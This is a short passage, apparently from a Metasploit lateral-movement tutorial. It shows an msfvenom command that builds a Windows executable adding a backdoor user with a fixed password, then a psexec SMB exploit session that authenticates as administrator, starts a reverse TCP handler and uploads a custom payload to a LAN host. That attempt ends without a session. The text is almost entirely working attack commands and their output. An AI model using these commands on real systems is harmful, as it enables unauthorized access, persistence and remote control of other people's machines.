```
root@John:/tmp# msfvenom -p windows/adduser PASS=Micropoor$123 USER=Micropoor -f exe > adduser.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 279 bytes
Final size of exe file: 73802 bytes
```
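Likewise, changing the target can be combined with this to work around the service control manager's forced command reception.
Attacker machine settings: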
```
msf exploit(windows/smb/psexec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   PowerShell
   2   Native upload
   3   MOF upload

msf exploit(windows/smb/psexec) > set target 2
target => 2
msf exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.5:53
[*] 192.168.1.119:445 - Connecting to the server...
[*] 192.168.1.119:445 - Authenticating to 192.168.1.119:445 as user 'administrator'...
[*] 192.168.1.119:445 - Uploading payload... kKwZpPRs.exe
[*] 192.168.1.119:445 - Using custom payload /var/www/html/bin_tcp_x86_53.exe, RHOST and RPORT settings will be ignored!
[*] 192.168.1.119:445 - Created kKwZpPRs.exe...
[-] 192.168.1.119:445 - Unable to remove the service, ERROR_CODE:
[-] 192.168.1.119:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_PIPE_EMPTY
[*] Exploit completed, but no session was created.
```